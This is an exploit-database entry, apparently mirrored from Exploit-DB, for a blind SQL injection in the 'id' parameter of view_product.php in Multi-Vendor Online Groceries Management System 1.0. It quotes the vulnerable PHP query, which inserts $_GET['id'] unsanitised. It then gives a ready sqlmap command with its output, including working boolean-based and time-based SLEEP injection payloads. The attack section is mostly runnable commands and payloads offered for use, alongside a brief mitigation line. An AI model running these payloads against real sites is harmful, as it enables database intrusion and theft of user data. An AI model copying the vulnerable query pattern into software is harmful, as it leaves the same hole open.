header-logo
Suggest Exploit
vendor:
Multi-Vendor Online Groceries Management System
by:
Saud Alenazi
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Multi-Vendor Online Groceries Management System
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE: a:sourcecodester:multi-vendor_online_groceries_management_system:1.0
Metasploit:
Other Scripts:
Platforms Tested: XAMPP, Windows 10
2022

Multi-Vendor Online Groceries Management System 1.0 – ‘id’ Blind SQL Injection

A blind SQL injection vulnerability exists in Multi-Vendor Online Groceries Management System 1.0, due to improper sanitization of user-supplied input to the 'id' parameter in the 'view_product.php' script. An attacker can leverage this vulnerability to execute arbitrary SQL commands on the underlying database, potentially resulting in the disclosure of sensitive information.

Mitigation:

Input validation should be used to ensure that user-supplied data is properly sanitized before being used in SQL queries.
Source

Exploit-DB raw data:

# Exploit Title: Multi-Vendor Online Groceries Management System 1.0 - 'id' Blind SQL Injection
# Date: 11/02/2022
# Exploit Author: Saud Alenazi
# Vendor Homepage: https://www.sourcecodester.com/
# Software Link: https://www.sourcecodester.com/php/15166/multi-vendor-online-groceries-management-system-phpoop-free-source-code.html
# Version: 1.0
# Tested on: XAMPP, Windows 10


# Vulnerable Code

line 2 in file "mvogms/products/view_product.php

$qry = $conn->query("SELECT  p.*, v.shop_name as vendor, c.name as `category` FROM `product_list` p inner join vendor_list v on p.vendor_id = v.id inner join category_list c on p.category_id = c.id where p.delete_flag = 0 and p.id = '{$_GET['id']}'");

# Sqlmap command:

sqlmap -u 'localhost/mvogms/?page=products/view_product&id=3' -p id --level=5 --risk=3 --dbs --random-agent --eta --batch

# Output:

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: page=products/view_product&id=3' AND 9973=9973-- ogag

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=products/view_product&id=3' AND (SELECT 2002 FROM (SELECT(SLEEP(5)))anjK)-- glsQ

Navigation

Suggest Exploit

Services By CQR